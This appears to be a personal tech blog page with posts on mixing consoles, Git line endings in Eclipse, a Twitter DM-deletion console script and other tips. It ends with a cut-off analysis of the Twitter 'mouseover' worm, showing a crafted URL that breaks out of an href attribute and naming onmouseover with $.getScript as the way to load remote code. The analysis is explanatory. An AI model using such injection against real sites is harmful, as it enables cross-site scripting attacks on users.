This is what “the perfect mixing console” should be in 2022

Mixing consoles have come a long way in the last couple of decades. A lot has improved, to the point where today I think we might be close to what I’d call “the perfect solution”. We’re close but not quite there yet. Here’s what I think is missing.

I’ve been doing sound reinforcement for all kinds of live performances for the last… phew, 15-20 years or so – it certainly feels like it’s been that long. During that time, I’ve used all kinds of equipment for mixing: analog and digital mixers from companies like LEM, Yamaha, Soundcraft, Behringer,… I even had to use my smartphone once (that wasn’t planned, but it saved my ass – that’s another story). Of course, a “perfect solution” is highly subjective: what I consider “perfect” might not meet someone else’s needs at all. You probably won’t agree with everything, but I think I can speak for the majority of small to medium and maybe even some large-scale productions. So let’s look at what’s out there and what it needs to become my “perfect” solution.

First, it has to be digital. I’m a digital native and a software engineer; by now I can handle fader banks, layers, virtual patching and the like. Nobody wants to carry huge analog consoles, snakes and a truckload of outboard gear these days. Let’s just take that as a given.

Second, I don’t own or work for a production or dry hire company. By that I mean: while not the only criterion, price is something I have to keep in mind. For the kind of work I do, consoles from manufacturers like DiGiCo or Avid are simply way too expensive. The good thing is that, again, for the work I do, I don’t need such high-end consoles. So for me, this rules out high-priced solutions. Then there are solutions that are “affordable for mere mortals” but aren’t that great (e.g. I have used a Yamaha TF3 and can only agree with its critics). When it comes to price-performance ratio or “bang for the buck” in a price range I’d call “affordable”, there’s just no way around Behringer. While there are a couple of great alternatives from companies like Soundcraft, Allen & Heath or Presonus, they always seem to be missing a handful of features or to be less flexible than the matching Behringer product, while always being a bit more expensive. Since Behringer (or rather “Music Tribe”, as their mothership is called today) acquired Midas and Klark Teknik in 2009, they’ve been able to mix and match these companies’ technologies to bring even more “bang for the buck” and make competitors’ lives even harder. Look, I don’t want to sound like a Behringer fanboy and there are certainly valid alternatives out there. But for me, Behringer’s X32 ecosystem (which is compatible with Midas’ M32 one, should I ever need something “more solid”) is the one I went with a couple of years ago. And since it’s the ecosystem I know best at this point, I’ll use it and its products as examples from here on – knowing that they’re certainly neither the “only” nor necessarily the “best” solution for everyone out there. I hope you can bear with me even if that particular ecosystem is not your cup of tea.

After ruling out analog mixers and high-end prices, the next thing to consider is the feature set and flexibility of the solution. Your “required” or “desired” feature set will heavily depend on your use case. Here are just a few things to take into consideration:

  • Quality of available AD/DA converters and Preamps
  • Total number of input channels the mixer engine can handle
  • Number of buses (are they stereo / mono?)
  • Quality of on-board plugins (EQs, dynamics, effects,…)
  • Digital routing flexibility (e.g. can I feed the delay return back into the reverb?)
  • Ease-of-use / flexibility of the available control surfaces (more on that later)

Usually, most of these things are pretty decent these days. One thing that bugs me with the X32 platform is the number of available mix buses. I find 16 mono mix buses somewhat limiting when you consider that you need them for effects, IEM/monitor mixes and subgroups. DCAs can replace subgroups in some cases, but on some projects I like to use group compression, or put a de-esser on a vocal group because there are too few FX slots to put one on each individual vocal channel. A DCA group just can’t do these kinds of things. Additionally, if I’d like to pan backing vocals or run stereo signals through subgroups, a mono bus just isn’t enough… long story short: I tend to run out of mix buses fairly easily. Fortunately, Behringer’s next-gen Wing engine comes with 16 stereo buses, which should make my life much easier – once I’m able to use that Wing engine (we’ll get to that later).

Another X32 pain point is the limited routing flexibility. To be fair, this has improved with newer firmware versions: the workaround they found to make the group-of-8 patching more flexible feels clumsy, but at least there is one. Beyond that, though, we still encounter seemingly arbitrary limitations. For example, adding salt to my previous pain point, you can only choose a channel’s pickup point for pairs of buses. Wanna put an FX send bus next to an IEM bus? Well, depending on which bus numbers you have at hand, that might not be possible.

Bus send page of the X32-Edit Mac App

The Wing engine lifts this limitation as well. In general, it allows for much more flexible routing across the board than the X32 engine. I’ve heard concerns that this increased flexibility might leave less experienced users lost, but as far as I’m concerned, I always embrace more flexibility. Less experienced users can be guided by a good user interface, and that can be improved through software updates. If the engine itself doesn’t allow flexibility, however, that’s a wall power users are going to hit sooner or later, and one that no software update can tear down. So well done on the Wing engine for this one, Behringer!

So far I’ve only been narrowing down existing choices and at this point, you might be wondering about the “what’s missing” part I promised. Well then, here it is:

Hardware portability and modularity

Unlike all other areas, it seems this one doesn’t keep on getting better with every new model. There has been some good in the past but also some very bad – even with some of the most recent models.

In the pro audio industry, there seems to be this belief that “to be credible, a console has to be huge and heavy”. Why is that? If I hadn’t already ruled out DiGiCo consoles because of their premium price tag, I certainly would’ve done so now: you need a warehouse to store them and a truck plus a whole crew to get these things from A to B (maybe with the exception of the SD11). Don’t get me wrong though! For large-scale productions, big consoles on which you have a great overview and direct access to as much of your mix as possible are absolutely justified and even desirable (and since that’s what DiGiCo is going for, their big consoles’ size is perfectly justified). However, most small-to-mid sized productions and projects aren’t going to need big control surfaces like this. So making these things huge and heavy should be a thing of the past. Move on, get creative, make things smaller and lighter and save all our backs.

DiGiCo SD7
97OllieB, CC BY-SA 4.0, via Wikimedia Commons

This might come as a surprise but when I switched to the X32 ecosystem, I specifically chose against any of the X32 models with a control surface. I chose the X32-Rack and I am still more than happy with that decision. See, at that time, I had (and still have) lots of gigs with recurring performers / bands and I usually have the chance to build a solid console scene in advance. During the event, the amount of tweaking can be kept to a minimum. Also, with one of my projects we regularly perform as one of several acts at shows that are already running when we arrive. On stage, we have to set up a 4-piece band with instruments, backline, microphones, mixer, monitoring and have a 2xXLR stereo signal ready in ~ 5 minutes, all of this with only the musicians and me as the sound guy. Also, I don’t have a fixed FOH spot most of the time so I need to be wireless and able to position myself wherever I want in the venue.

These scenarios led me to go for an X32-Rack as the mixer and an iPad with the M32-Mix app as the control surface. The portability of this solution is stellar: A single portable rack on wheels with a handle that looks more like hand baggage than a flight case (called “Rackbag” and built by Gator) holds the console, a network router with a detachable wireless access point, a power distribution strip and even the iPad itself. When I need the 8 extra inputs, I have an SD8 digital stagebox sitting in a transport bag ready to go. All of this is lightning fast to set up and fits on the passenger seat of any car. I LOVE it, so much in fact that I never want to go back. That brings me to my criteria: the whole mixing solution has to be sized and have a weight such that a single person can carry every individual part of it and the whole solution has to fit in pretty much any regular car – all of this with the equipment safely sitting in appropriate transport cases.

X32 Rack in a Gator Rackbag

You might think that my usage scenarios are corner cases and that controlling even a mid-sized event without a ready-to-go mixer scene and only an iPad is anything but comfortable – and you’d be absolutely right: I’d never do that. In fact, we’ve only talked about portability so far, and here’s where modularity comes into play. A highly scalable solution has to separate the 3 elements that make up a modern digital console: the engine, the i/o and the control surface. With “the perfect solution”, it must be possible to mix and match any of them. Having this modularity would, by the way, make the portability goals pretty easy to achieve. In fact, this idea isn’t new. While researching for this article, I was reminded of the Avid VENUE S3L console. With the S3L, Avid did exactly that: they separated the engine from the i/o and the control surface. The S3L was arguably among the most elegant live control surfaces I’ve seen to date. Unfortunately, as said before, that solution was way above my budget, and besides that it seems to have been discontinued in the meantime in favor of, yet again, huge and heavy fully integrated VENUE control surfaces.

Avid VENUE S3L control surface in use
Basshag, CC BY-SA 4.0, via Wikimedia Commons
Avid S3 control surface product picture
Source: https://www.avid.com/products/avid-s3

So let’s look at Behringer again. I think we can agree that they modularized the i/o part pretty flawlessly: They have 8×8 all the way up to 32×16 digital stage boxes. If you want even better preamps, Midas has you covered. If you’re looking for personal monitoring solutions, there’s the Behringer P16M or the Midas DP48. I know I sound like a sales rep at this point, but that part is modularized, flexible, compatible and there’s not a single device that doesn’t meet my portability criteria, so hey: thumbs up to that!

Now when it comes to modularizing the engine and the control surface, things don’t look so good. In fact, I have a couple of projects coming up where I won’t be able to have a ready-to-go mixer scene but where I could have a fixed FOH space in the venue. An iPad as the only control surface doesn’t seem ideal there. I’d really like to bring a control surface with me, but today’s options are… disappointing. After all the praise I gave the X32 and Wing ecosystems before, I unfortunately cannot do the same when it comes to the modularity and portability of their control surfaces. Yes, there’s the X-Touch family of products that works with the X32 family of consoles, so there is some modularity here – great! However, the X-Touch seems to have been built primarily to control DAWs in the studio. Yes, it can control X32 consoles complete with parametric EQs, dynamics, some routing, mute groups etc., but the way the controls are mapped onto the rotary encoder row seems far from intuitive. The goal of a control surface is to let you quickly reach a setting and tweak it, and while I think the X-Touch is a great start when it comes to control surface modularity, it’s not what I’d consider “the perfect solution”. (Also, its price recently jumped up despite its age, making it even less attractive.)

A Behringer X-Touch annotated to be used with an X32 engine
Source: getlostinsound on YouTube, https://www.youtube.com/watch?v=ugm2-tLwnnU

Why can’t I have a control surface like the Wing’s? The Wing’s control surface looks awesome and has everything I want: a big comprehensive touchscreen, a bunch of faders and control knobs – that’s it. Plus, it’s super slim, right? Wrong! Yes, the Wing’s control surface (the light gray part) seems really slim. Unfortunately, Behringer decided to attach the “engine” part of the console to the bottom of the control surface. As great as the Wing is, I think this was a really bad decision. I can only guess the reasoning behind it: it’s probably more ergonomic to have big consoles pointing at the user at an angle rather than lying horizontally flat on the table – so why not use that angle and put the mixer engine and some digital and analog i/o in there? Well, because it wastes an incredible amount of space. Case builders now have to enclose a huge volume of air. The flight case itself ends up so big that it’s not portable by a single person, cannot be transported in a regular car and can probably only be stored in a warehouse. Exactly like the original full-sized X32. It’s really a huge missed portability opportunity.

Behringer Wing Console Flight Hard Travel Case by ZCase product image
Source: https://www.proxdirect.com/products/view/Behringer-Wing-Console-Flight-Hard-Travel-Case-Flip-Ready-Easy-Retracting-Hydraulic-Lift-for-by-ZCase-XZF-BWING#largeSlide

How can this be improved? Well, first of all, detach the control surface from the engine. If you really want it to be tiltable, add a retractable mechanism underneath it like the one used for its touchscreen. Make the engine a 3-4U rack-mount unit that comes with digital and some analog i/o out of the box (hint: just like the X32-Rack). The rest of the control surface could be kept as-is for large-scale events. Personally, I don’t need to mix with 2 engineers and I’d like a smaller version of it: so for “the perfect solution”, make the controls just a bit more compact and shave off some faders and about 1/4 of the “do whatever you want with it” knobs. A slightly smaller Wing control surface could lean towards the Avid S3L in terms of thickness and size and could fit in a perfectly sane-sized, very slim flight case meeting all the portability criteria above. Just make sure the touchscreen keeps the same size.

With a modular solution like this, I could just take the engine with an iPad for my quick-and-dirty gigs, attach a bunch of i/o if needed and attach a bigger flexible control surface when things get serious. And all of that could be carried by a single person, transported in a regular car and stored in a regular basement. There we have it, “the perf…” – no wait, there is one more thing.

There’s one aspect that tends to be forgotten when it comes to modularizing a digital console: what about the local i/o I do want to have at the FOH? Like a talkback microphone, a pair of headphones or near-field monitors, a CD/mp3/media player of some sort or even outboard gear? All of these could be very important depending on the scenario but now that we’ve separated the control surface from the engine, there’s no audio left at the control surface. That is actually already one of the major downsides of the X-Touch products today: no talkback, no monitoring and no local i/o at the FOH.

Sure, I could place the engine itself at the FOH and use its analog i/o or attach an external i/o box. However, that still doesn’t give us a ready-to-use headphone amp and connector. Plus, I could easily imagine scenarios where it would be more suitable to have the engine running on or behind the stage – and we want to be flexible after all, right? At this point, we have to ask ourselves: how would the control surface and the core communicate? As it stands today, it seems to me that Behringer has maneuvered themselves into a corner here: AES50 can carry audio over a CAT5 (ethernet) cable, and the consoles can be controlled via ethernet – but while they use the same type of cable, the protocols are not the same. AES50 cannot be routed by your standard TCP/IP router and, to my knowledge, cannot transport remote control data (yet?). On the other hand, regular TCP/IP networks like the one used for remote controlling the X32 from the X-Touch or an iPad are notoriously bad at real-time / low latency multichannel audio (with Dante probably being the best option in this space, but that’s out of scope for the problem at hand). So as it stands today, it seems you’d have to connect the engine to the control surface with 2 CAT5 cables (one for control, one for audio) if the latter should have some local audio i/o. Alternatively, Behringer could use their new StageConnect technology to get some audio to and from the control surface. But since that uses a regular XLR cable, you’d still have to run 2 cables, which would still be less than ideal. So this remains one of the problems left to be solved: being able to remote control a console while also sending a bit of audio back and forth over a single cable.

So to summarize: a lot of aspects of today’s digital console platforms are very good already: they are available in all kinds of sizes and the on-board feature sets usually cover today’s needs pretty well. Digital stage boxes – by their very nature – are well modularized already: they’re flexible, portable and available at different quality and price levels. What’s missing is modularity, portability and flexibility for the rest of the hardware, especially control surfaces.

Eclipse & Git: Mind your Windows line endings!

Recently, our team at work stumbled upon a strange behavior in their Git projects: files with Windows CRLF line endings were checked into the git repository. If you know git, you’re aware of the line ending settings and that line endings should basically never be an issue. Well, it turns out they are – quite often.

How it should work

While investigating the issue, I found the excellent Mind the End of Your Line article over at adaptivepatchwork.com, which explains how line endings should be handled in the first place. It also helped me find the cause of the issue, so props to them!

The most important bit in this case is the core.autocrlf setting. Like every git setting, it can be specified per repository or globally (per OS user). On Windows, the recommendation seems to be setting it to true, which makes git use Windows CRLF in the workspace and auto-convert line endings to LF when committing to git’s object database. Going with the input setting also shouldn’t cause too much trouble: in this case, git checks line endings out into the workspace as they are in the object database without changing them, but still makes sure to replace any Windows CRLF line endings with Unix LF when committing to git’s object database.

The only core.autocrlf setting to avoid at all cost, at least on Windows, is false. It causes git to commit line endings into its object database exactly as they appear in the workspace – the only setting that lets Windows CRLF into git’s object database.
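To make this tangible, here’s a quick experiment in a throwaway repository (just a sketch – the file name and content are purely for illustration):

```shell
# Throwaway repository to inspect what core.autocrlf actually commits
cd "$(mktemp -d)"
git init -q .
git config core.autocrlf input

# Create a file with Windows CRLF line endings in the workspace
printf 'hello\r\nworld\r\n' > crlf.txt
git add crlf.txt

# With autocrlf=input (or true), the staged blob contains plain LF only:
git show :crlf.txt | od -c
# With autocrlf=false, the \r characters would end up in the object database.
```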

Our setup

We are mostly dealing with Java projects, but our repositories contain a bunch of shell scripts for automation, testing and the like. Our development machines are Windows workstations, while the test and production servers run Linux/Unix. We use Eclipse along with its EGit plugin for development.

The symptom

I once had to merge a huge feature branch. After resolving merge conflicts and committing my changes, I noticed that pushing the merge took longer than usual. Also, the git repository had nearly doubled in size. It turned out that my merge just changed every single text file’s line endings to Windows CRLF in the repository.

I fixed it by resetting everything to Unix LF line endings. However, after a couple of months, we noticed that Windows line endings were slowly crawling back into the repository – apparently accumulating through multiple developers’ commits and merges over time.

Pinpointing the problem

This turned out to be a nightmare. It took an awful lot of time to reproduce the problem, let alone find a logical explanation to why this kept happening.

Whenever I ran git config core.autocrlf in a repository, it always yielded the expected input, so I didn’t suspect the autocrlf option and didn’t care that git config --global core.autocrlf wasn’t set. I ended up creating a test git repo and running a bunch of merges with intentional conflicts before I was able to pinpoint the exact constellation causing the problem:

As it turns out, it is a combination of the git spec, the Windows git command line and Eclipse’s EGit plugin causing the issue.

  • The git documentation states that settings are found either in the current repository’s ./.git/config file or in the global %HOME%\.gitconfig, the latter being the fallback if they’re not found in the former. It also specifies that the default value for the core.autocrlf setting is false – remember? That’s the worst possible setting on Windows if line endings matter…
  • The Windows git client (from git-scm.com) does ask for the core.autocrlf setting during setup to make sure you have it set, but it doesn’t seem to store it in the documented global location (%HOME%\.gitconfig). Instead, it seems to store it somewhere else (I haven’t found where, though) and uses that location as the ultimate fallback during command-line git invocations when the setting isn’t found in the usual locations. As long as you only ever use the command-line git, you’re fine. However…
  • Eclipse’s EGit plugin doesn’t use the command-line git client directly but comes with its own implementation, which does honor the documented locations and settings. However, as the “magical ultimate fallback” used by the Windows git command-line client seems to be undocumented, Eclipse couldn’t possibly know about it. So from Eclipse’s point of view: no core.autocrlf in the repository, no core.autocrlf in %HOME%\.gitconfig – use the default value: false. If you then happen to commit merges, or even worse, if you previously cloned a repository with core.autocrlf set to true, your Eclipse will end up committing everything with Windows line endings while your command-line git behaves perfectly fine.
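By the way, newer git versions can show you where each configuration value actually comes from, which makes this kind of detective work a lot easier (a sketch, assuming a reasonably recent git):

```shell
# List every config value together with the file it was read from
git config --list --show-origin

# Or query a single setting per scope explicitly:
git config --system core.autocrlf || echo "(not set at system level)"
git config --global core.autocrlf || echo "(not set at global level)"
```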

I checked with some colleagues from other teams and they also had the global core.autocrlf setting unset – and incidentally, their Eclipse was behaving strangely in the git synchronize view. After they set the global setting, everything was fine. So it looks like manual action is needed to make it work correctly.

Oh, and to make things even worse: I currently suspect something is overwriting my %HOME%\.gitconfig and removing the core.autocrlf setting, as it magically disappeared somewhere in the last weeks. I’m not quite sure what it is, though…

In conclusion, TL;DR

If you use Eclipse and Git on Windows, make sure you have the core.autocrlf option globally set to true AT ALL TIMES!

To check for the option:

    git config --global core.autocrlf

(this should yield true).

To set it:

    git config --global core.autocrlf true

May this post help other poor souls like me! 😉

– Cheers!

The tech behind Pro7’s “Keep Your Light Shining” – a commentary

Two German TV networks launched new TV formats this month. What’s so special about that? They involve their viewers in the show in a highly interactive and extensive way via the internet.

First, there was Quizduell. ARD went first… and promptly blew it. “A hacker attack”, they said, had brought the servers down. In hindsight, it’s not at all clear whether it wasn’t simply the high load you’d expect from a live TV broadcast. What deserves credit, though, is that everyone involved took the failure in stride and with humor. I’m happy to forgive a misstep like that – after all, it’s all #Neuland 😉 About a week later, all the technical issues were fixed and the show went ahead with internet users participating as planned.

Today it was the private networks’ turn, represented by Pro7 with the music show “Keep Your Light Shining”. Out of fun and curiosity, I actually let an app connect to my Facebook profile for once and participated via the browser.

I was impressed by the technology from the start. How the developers managed to keep the web application so tightly in sync with the TV picture is truly remarkable. The show works like this: in every round, a song is sung – by all candidates in turn, in 30-second intervals. The website updated its display on every candidate change… and, at least for me, almost to the second in sync with the TV picture. All in HTML5, without any audio watermarking and even without WebSockets.

Since I’m no blank slate in this field, I took a closer look at the technology Pro7 used during the broadcast and derived a few best practices 🙂

Facebook’s React was used as the view layer, so most of the application’s mechanics were programmed in JavaScript ahead of time. A JSON configuration file told the application about the week’s candidates with all their details like names, pictures and so on (so only this one file needs to be swapped out for the next episode of the show). In other words, primarily a handful of static resources were involved: the small HTML file, React itself, the KYLS JavaScript application, the JSON candidate configuration, a bit of CSS and a few images, all delivered via Amazon’s CloudFront. With this high-performance CDN, serving the static resources is a non-issue.

That leaves the synchronization and the actual voting.

As far as I could tell, the synchronization was implemented with plain old 10-second polling. Worth mentioning: every byte counted in the polling responses – what was transferred was a JSON object with single-letter keys and nothing but numeric IDs and arrays as values. The JSON polling conveys the state of the show (current round, who’s still in it, who’s singing right now,…) to the React application. What was used server-side, I obviously can’t know. I only know that the web server identified itself as “Apache”, and that this application relied on Amazon’s cloud as well. DNS round-robin returned a good three dozen Amazon servers (at which point I stopped querying ;)) – the cloud, you know. I’d really be curious what they used server-side for persistence / as the data store, though…
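As a sketch, such a byte-frugal status payload and its handling on the client might look something like this (the key names, values and endpoint are my own invention, not Pro7’s actual schema):

```javascript
// Hypothetical compact status payload, e.g. '{"r":3,"c":[5,9,12],"s":9}'
// r = current round, c = candidate IDs still in the round, s = ID singing now
function parseShowState(json) {
  var o = JSON.parse(json);
  return { round: o.r, candidates: o.c, singing: o.s };
}

// The page would poll this every ~10 seconds and re-render on change, e.g.:
// setInterval(function() {
//   $.get('/status.json', function(txt) { render(parseShowState(txt)); });
// }, 10000);

console.log(parseShowState('{"r":3,"c":[5,9,12],"s":9}'));
// → { round: 3, candidates: [ 5, 9, 12 ], singing: 9 }
```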

The voting – thumbs-up or thumbs-down clicks – was implemented, much like the polling, with a standalone XMLHttpRequest to the Amazon servers. It contained the round and the candidate ID as URL parameters. I assume the unique user ID (from the Facebook account) was carried in the cookies in some form. No magic, all straightforward.
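The vote request could then be as simple as this sketch (again, the parameter names and endpoint are my guesses, not Pro7’s actual API):

```javascript
// Hypothetical: build the vote URL – round and candidate ID go into the
// query string; the user's identity travels along in the session cookies.
function voteUrl(round, candidateId, thumbsUp) {
  return '/vote?round=' + round +
         '&candidate=' + candidateId +
         '&value=' + (thumbsUp ? 'up' : 'down');
}

// Fired off as a standalone XMLHttpRequest, e.g.:
// var xhr = new XMLHttpRequest();
// xhr.open('GET', voteUrl(3, 9, true));
// xhr.send();

console.log(voteUrl(3, 9, true)); // → /vote?round=3&candidate=9&value=up
```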

Takeaway: make as much as possible static, avoid rendering dynamic HTML server-side in favor of client-side JS libraries like React, cache the static content and rely on CDNs, use scalable application servers (e.g. Amazon’s cloud) for interactions, and save every byte when live-updating/polling.

From a technical perspective, at least, I enjoyed the show! I’m curious what internet formats the networks will come up with next, which of them will work out technically, and how they’ll be built 🙂

How to delete entire twitter conversations (direct messages)?

I recently wanted to delete a massive twitter conversation with thousands of messages. To my surprise, there’s no way to delete a whole conversation with a single click in the Twitter.com web GUI. The Twitter MacOS app has a “Delete Conversation” entry in a conversation’s context menu, but that just removes it from the GUI. Restarting the app shows that it is, in fact, still present.

My guess is that their Message storage doesn’t allow efficient deletion of conversations. But what if I _really_ want to get rid of them?

An option is to search for these services… you know… those shady ones that claim they can do the job for you, want access to your twitter account and, after you have granted them full access, ask you to take out your wallet and pay if you _really_ want them to help you. Well, F such a business model. Seriously.

There’s an easier, much safer way to delete entire conversations and guess what: I’ll tell it to you for free!

Okay, here’s what you do:

  1. Open Chrome (we’ll need the developer console. Other browsers might work, too, but I use Chrome, so I’m gonna stick with it here)
  2. Log in to twitter and go to your “Me” page
    https://twitter.com/<yournick>
  3. Open your messages (the button with the envelope) and select the conversation you want to delete. You now have the conversation-to-be-deleted in front of you.
  4. Open the JavaScript Developer console (Command+Alt+J on Chrome / MacOS)
  5. Paste the following JavaScript into the console and press enter:
    // add a status indicator to twitter's top navigation bar
    $('#global-actions').append($('<li id="del-script">').append($('<a class="js-nav">').text('...')));
    window.delscrpt = setInterval(function() {
      // dismiss any visible "could not delete" error popups from previous attempts
      $('.js-dm-error:visible').each(function() { $('a.js-dismiss', this).click(); });
      var count = $('.js-dm-delete').length;
      if (count < 3) {
        $('#del-script a').text('Del Done.');
        clearInterval(window.delscrpt);
        return;
      }
      // pick a random message to delete (0-based index, see disclaimer below)
      var randIdx = Math.floor(Math.random() * count);
      $('#del-script a').text('Del ' + randIdx + '/' + count);
      $('.js-dm-delete').eq(randIdx).click();
      // confirm twitter's "are you sure?" prompt
      $('.dm-delete-confirm .js-prompt-ok').each(function() { $(this).click(); });
    }, 2000);
  6. Sit back, relax and watch your conversation disappear one message at a time.

DISCLAIMER:

  • Don’t expect any support. Use at your own risk. I think this should be pretty obvious 😉
  • This method works by directly manipulating the HTML DOM of the twitter page (remote controlling the GUI if you will). It works for now (mid-September 2013), but if twitter changes their homepage, this method will die. Keep that in mind.
  • The deletion might take some time. We don’t want to hammer the twitter servers and get our account blocked after all 😉
  • Twitter has some major issues with message deletion (internal server errors and stuff). That’s why we can’t delete messages in order and have to delete them randomly until the conversation is empty. You can’t just delete parts of a conversation. You’ve been warned.
  • The script will stop when less than 3 messages are left in the conversation, in order not to bug out. You’ll have to spend the 10 seconds and delete these last messages manually.
  • The script displays some numbers in the twitter navigation bar (in the background). The first number is the index of the randomly selected message that’s being deleted from within the returned message list. The second is the total number of messages currently returned by the twitter servers. This total number doesn’t represent the “real” number of left-over messages all the time. That’s just because of the way twitter works and spits out your messages… Non-deterministic NoSQL and stuff…

Hope it’s useful to anyone 🙂

Eclipse: “Insufficient access privileges to apply this update”

If you’re trying to update your Eclipse on your magnificent Windows box* through the integrated update mechanism, and are seeing “Insufficient access privileges to apply this update” when you try to select an element, just run Eclipse with admin privileges and it should go through.

To quickly run Eclipse with admin privileges: open the start menu, search for “Eclipse”, point to it and run it with CTRL+SHIFT+Enter.

* WARNING: Irony

Running Google Chrome with custom Proxy on OSX

Since Lion, Safari has a painful memory leak issue that keeps filling up all of my Mac’s RAM when I keep the browser open for a couple of days (closing tabs after use, of course). Since this is incredibly annoying, I ended up switching to Google Chrome and … boy, that thing is fast!

However, I ran into an issue when I tried using Chrome at work: We have very $*#(%#@_ Proxy settings here. Long story short: Chrome only works with one given set of proxy settings, and all other applications only work with another set of proxy settings. The fact that Chrome absolutely wants to use the OS Proxy settings (in fact, doesn’t even come with custom Proxy settings) was a killer and made the whole browser useless to me… at first 🙂

I started looking into Chrome extensions that promised to switch proxies and use custom ones… It looked to me like they were trying to change the OS’ Proxy settings, which is totally not what I wanted.

After some Google’ing, I finally came across this OSX hint. And YES, it works! 🙂 Together with a little bit of Automator magic, here’s what I ended up doing:

  1. Open Automator
  2. Select to create an Application
  3. Double-click Run Shell Script in the Library/Utilities folder
  4. Replace the text content (cat) with the following:
    open -a "Google Chrome" --args --proxy-server=host#:port#
    (Replace host# and port# with the host and port numbers that you need to use)
  5. Save as an application somewhere and use it to launch Chrome with your specified proxy.
That’s it, works 🙂

[Java] If you can’t login to your Glassfish Admin Console these days…

If you use Oracle’s Glassfish Application Server and cannot log in to your admin Web Console (the server loads forever after entering credentials), here’s what’s going on:

The Admin Web Application loads the available module updates from java.net upon login… however, if java.net is down (like right now), or if your internet connection died or is slow, your admin console won’t load. No, they didn’t build in a timeout and yes, this is the default behavior. Thanks, Oracle!

Fortunately, there’s a workaround (which you might want to apply in any case…). There are two steps to make your Glassfish Server internet-independent:

  1. Disable Automatic Update Checks
    Rename $GLASSFISH_INST/glassfish/modules/console-updatecenter-plugin.jar to console-updatecenter-plugin.jar.disabled
  2. Disable News and other Internet-Dependent Admin GUI Features
    Set the following System Property (in the Admin GUI, provided you can open it, under Configuration > JVM Settings > JVM Options):
    -Dcom.sun.enterprise.tools.admingui.NO_NETWORK=true

That’s it! Now go out and enjoy your independent server 🙂

Take it with humor :)

Today, I crawled through a pile of old emails and found two special-looking ones. They were from a well-known software company. Here’s the first one:

Confirmation [company event] 2011

Dear Mike,

We hereby confirm your registration for the [company event]. Below you will find some useful information about the event.

DATE […]
VENUE […]
ROUTE […]

REGISTRATION
Please print this confirmation and present it at the registration counter.

AGENDA
Registration starts at 8:00 AM. Coffee and tea will be available. The first session starts at 9:30 AM. The final session ends at 5:00 PM. […]

DRESS CODE
Business or business casual.

We are looking forward welcoming you at the [company event].

Kindest regards,
The [company event] Team

Of course, I never registered for that conference, but I must have an account on their website for them to have my email address… I guess… Well, here’s the second email from them, sent only about two and a half hours later:

Dear Mike,

We sent you a confirmation email for the [company event] in error. Please ignore this email as you did not register for this event.

We apologize for the inconvenience.

Kind regards,
The [company event] Team

Well, not a big deal to me, these things happen. But since the weather is so good today and I’m in a pretty good mood (despite having to get back to work tomorrow after a week off), I answered their second mail… with a bit of humor 🙂

Dear [company event] Team,

Oh dear! What a terrible mistake… I was so looking forward to participating in the event after I got your first mail… Not only was it quite a letdown when I got the second one, but I also had to cancel my flight, the baby-, dog- and fish-sitters, and get all the food I’d need to stay at home, frustrated, knowing you just virtualized my forum attendance…

Don’t you think I’d deserve a [company product] license for the caused inconvenience? 😉

Best regards,
Mike

… looking forward to hearing from them 😀

Note: Used square brackets to anonymize the company, as accusing them isn’t the goal of this post 😉

My ESC 2011 Top 10

It’s been a while since I last took the time to write a piece of text longer than 140 chars 😛 So let’s take the Eurovision Song Contest (ESC) 2011 as an occasion to update my blog.

Yah, I know, there’s some controversy around the contest, “European Neighbor Contest” etc, and honestly, I hadn’t even planned on watching it this year. But what can I say, it got me again. I guess, being a musician myself, there’s no way around the biggest European music event anyway. So I watched (at least a major part of) it live and got myself the album afterwards.

After listening to it a couple of times, I gotta say there were a whole bunch of great songs in the contest this year. An accurate Top10 list is almost impossible to compile, but since Top10 lists are so popular on the internetz, I made an effort. So here’s my personal ESC 2011 Top10 (based solely on the songs themselves, not the live performances nor the YT-Videos):

  1. Coming Home / Sjonni’s Friends (Iceland) [YT]
  2. In Love For A While / Anna Rossinelli (Switzerland) [YT]
  3. New Tomorrow / A Friend In London (Denmark) [YT]
  4. The Secret Is Love / Nadine Beiler (Austria) [YT]
  5. Running Scared / Nikki & Ell (Azerbaijan) [YT]
  6. Never Alone / 3JS (The Netherlands) [YT]
  7. Change / Hotel FM (Romania) [YT]
  8. Que Me Quiten Lo Bailao / Lucia Perez (Spain) [YT]
    [Strong contestant for the Summerhit-2011 Title btw!]
  9. One More Day / Eldrine (Georgia) [YT]
  10. Da Da Dam / Paradise Oskar (Finland) [YT]


The Twitter “mouseover” hack – here’s how! [Update]

This article is mainly about the worm, not about the spam, but the mechanisms are similar.

First off, it wasn’t me. No, seriously. I just investigated after the fact to find out how such a huge flaw could have been possible and what mistakes _not_ to make in my next web project. You’ll need some basic HTML/javascript/common sense knowledge to follow me here, but I’ll try to keep it simple 😉

Step 1: The breach

Apparently, there was (it’s fixed now) a bug in the twitter website when it came to transforming tweet text that looks like a link into an actual link you can click on. This code has to identify text starting with “http://”, like “http://twitter.com”, and transform it into an actual link, which, in HTML, looks something like:

<a href="http://twitter.com">http://twitter.com</a>

The bug was that twitter didn’t recognize the end of a link properly. By inserting @" at the end of a legit URL, an attacker was able to escape the href attribute and inject code into the HTML code the twitter engine made out of his URL. Once you’re able to inject code into a website, hell’s doors are open. To the browser, it looks like twitter put that code there. Boom!

So for example by putting the link:

http://foo.bar/@"alt="google.com"

in a tweet, an attacker would have made the twitter engine generate the following HTML:

<a href="http://foo.bar/@"alt="google.com"> ...

Which, in this harmless case, would have printed a link to foo.bar with a hover label of “google.com”.
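To make the flaw concrete, here’s a minimal, purely illustrative sketch of a naive linkifier with the same class of bug (this is NOT twitter’s actual code): it wraps everything from “http://” up to the next whitespace in a link, without escaping quotes, so a quote inside the URL closes the href attribute early.

```javascript
// Hypothetical, simplified linkifier (not twitter's actual code) that
// reproduces the class of bug described above: it turns anything that
// looks like a URL into a link without escaping quotes.
function naiveLinkify(tweet) {
  return tweet.replace(/https?:\/\/\S+/g, function (url) {
    return '<a href="' + url + '">' + url + '</a>';
  });
}

// The " after @ closes the href attribute early, so alt="google.com"
// ends up as a real attribute in the generated markup:
console.log(naiveLinkify('http://foo.bar/@"alt="google.com"'));
```

Run that in a browser console or node and you’ll see the injected alt attribute sitting outside the quoted href.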

Step 2: Loading evil code

However, to do evil things, an attacker would need more than 140 chars worth of code. Therefore, he needed to load additional evil code. Here’s how:

So the attacker was able to inject code inside an HTML link. The thing is that HTML allows an “onmouseover” attribute in a link element, which executes javascript code when the mouse is hovered over that link.

Looking at the twitter HTML source, anyone interested can learn that they use the jQuery javascript framework. This framework is loaded into the twitter page anyway, so the attacker was able to happily use its functions. To his great pleasure, the framework has a function called $.getScript(url) which loads javascript code from the specified URL.

